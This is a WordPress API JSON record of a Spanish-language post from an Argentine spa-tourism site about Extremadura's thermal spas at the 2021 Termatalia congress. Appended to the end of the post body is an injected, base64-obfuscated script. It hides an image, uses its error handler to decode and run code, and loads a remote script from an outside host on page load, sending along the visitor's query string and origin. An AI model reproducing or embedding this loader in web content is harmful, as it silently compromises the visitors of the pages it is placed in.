{"id":4656,"date":"2021-09-07T11:32:51","date_gmt":"2021-09-07T14:32:51","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4656"},"modified":"2025-08-13T16:28:28","modified_gmt":"2025-08-13T19:28:28","slug":"los-balnearios-de-extremadura-vuelven-a-estar-presentes-en-el-2o-congreso-internacional-sobre-agua-y-salud-de-termatalia","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4656","title":{"rendered":"Los Balnearios de Extremadura vuelven a estar presentes en el 2\u00ba Congreso Internacional sobre Agua y Salud de Termatalia"},"content":{"rendered":"\n<p>La Regi\u00f3n de Extremadura (Espa\u00f1a) vuelve a apostar por las acciones profesionales de Termatalia y colabora con el 2\u00ba Congreso Internacional sobre Agua y Salud que se celebra en formato h\u00edbrido en Ourense entre el 15 y el 17 de septiembre de 2021. Esta colaboraci\u00f3n permitir\u00e1 adem\u00e1s que los Balnearios de Extremadura puedan mantener reuniones de negocio con los 23 touroperadores que participan en el Workshop especializado de Turismo de Salud y Bienestar que tambi\u00e9n organiza Termatalia en las mismas fechas.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><a href=\"https:\/\/congreso.termatalia.com\/\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" width=\"728\" height=\"90\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/728x90.gif\" alt=\"\" class=\"wp-image-4650\" \/><\/a><figcaption><span style=\"color:#0693e3\" class=\"tadv-color\">Publicidad:<\/span><\/figcaption><\/figure><\/div>\n\n\n\n<p>Las aguas termales de Extremadura han aliviado el cansancio de los viajeros durante siglos. Los balnearios de esta regi\u00f3n ofrecen mucho m\u00e1s que remedios a determinadas dolencias. Se han convertido en aut\u00e9nticos centros de bienestar, lugares donde descansar y disfrutar de la naturaleza, la cultura y la gastronom\u00eda.<\/p>\n\n\n\n<p>Con aguas declaradas de utilidad p\u00fablica, atenci\u00f3n especializada y elevado valor patrimonial, los centros termales extreme\u00f1os son una excelente opci\u00f3n para cuidarse y relajarse. Desde Turismo de Extremadura te proponen un recorrido por la Extremadura termal desde el norte al sur de la regi\u00f3n, sin alejarte demasiado de la V\u00eda de la Plata. Tu primera parada es el Valle del Ambroz, donde puedes encontrar los Balnearios de Ba\u00f1os de Montemayor, que conserva una terma romana, y El Salugral, en Herv\u00e1s, pueblo que destaca por su bien conservada juder\u00eda.<\/p>\n\n\n\n<p>No muy lejos, en Valdastillas, se sit\u00faa el Balneario Valle del Jerte, localizado en una comarca que cada primavera se viste de blanco con la floraci\u00f3n de un mill\u00f3n y medio de cerezos. El Balneario Fuentes del Trampal, justo en el l\u00edmite de C\u00e1ceres y Badajoz, est\u00e1 en la zona de Mont\u00e1nchez, conocida por su maravilloso jam\u00f3n ib\u00e9rico.<\/p>\n\n\n\n<p>M\u00e1s al sur, sin perder de vista la V\u00eda de la Plata, se llega a Alange, cuyas termas romanas forman parte del conjunto arqueol\u00f3gico de M\u00e9rida, Patrimonio Mundial desde 1993. Su balneario conserva unos ba\u00f1os del siglo III integrados en unas modernas instalaciones.<\/p>\n\n\n\n<p>El itinerario finaliza en el Balneario El Raposo, en Puebla de Sancho P\u00e9rez, bien situado para conocer pueblos con mucho patrimonio y buen jam\u00f3n ib\u00e9rico, como Zafra, Jerez de los Caballeros, Llerena y Azuaga.<\/p>\n\n\n\n<p>Mientras descansas en Extremadura estar\u00e1s en perfecta armon\u00eda con la naturaleza y la historia.<\/p>\n\n\n\n<p>M\u00e1s informaci\u00f3n en&nbsp;<a href=\"https:\/\/congreso.termatalia.com\/colaboradores-extremadura\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/congreso.termatalia.com\/colaboradores-extremadura<\/a><\/p>\n\n\n\n<figure class=\"wp-block-gallery columns-3 is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Balneario072-1024x681.jpg\"><img decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Balneario072-1024x681.jpg\" alt=\"\" data-id=\"4657\" data-link=\"https:\/\/argentinatermal.com.ar\/?attachment_id=4657\" class=\"wp-image-4657\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Balneario072-1024x681.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Balneario072-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Balneario072-768x511.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Balneario072-1536x1022.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Balneario072-696x463.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Balneario072-1068x710.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Balneario072-631x420.jpg 631w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Balneario072.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/BALNEARIO-RAPOSO-1024x683-1.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/BALNEARIO-RAPOSO-1024x683-1.jpg\" alt=\"\" data-id=\"4658\" data-link=\"https:\/\/argentinatermal.com.ar\/?attachment_id=4658\" class=\"wp-image-4658\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/BALNEARIO-RAPOSO-1024x683-1.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/BALNEARIO-RAPOSO-1024x683-1-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/BALNEARIO-RAPOSO-1024x683-1-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/BALNEARIO-RAPOSO-1024x683-1-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/BALNEARIO-RAPOSO-1024x683-1-630x420.jpg 630w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Brozas2.jpg\"><img decoding=\"async\" width=\"683\" height=\"1024\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Brozas2-683x1024.jpg\" alt=\"\" data-id=\"4659\" data-full-url=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Brozas2.jpg\" data-link=\"https:\/\/argentinatermal.com.ar\/?attachment_id=4659\" class=\"wp-image-4659\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Brozas2-683x1024.jpg 683w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Brozas2-200x300.jpg 200w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Brozas2-768x1152.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Brozas2-696x1044.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Brozas2-280x420.jpg 280w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Brozas2.jpg 800w\" sizes=\"(max-width: 683px) 100vw, 683px\" \/><\/a><\/figure><\/li><\/ul><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Regi\u00f3n de Extremadura (Espa\u00f1a) vuelve a apostar por las acciones profesionales de Termatalia y colabora con el 2\u00ba Congreso Internacional sobre Agua y Salud que se celebra en formato h\u00edbrido en Ourense entre el 15 y el 17 de septiembre de 2021. Esta colaboraci\u00f3n permitir\u00e1 adem\u00e1s que los Balnearios de Extremadura puedan mantener reuniones [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4660,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16,15,14,17],"tags":[],"class_list":["post-4656","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-medicina-termal","category-turismo-de-bienestar","category-turismo-salud","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4656"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4656\/revisions"}],"predecessor-version":[{"id":10786,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4656\/revisions\/10786"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4660"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}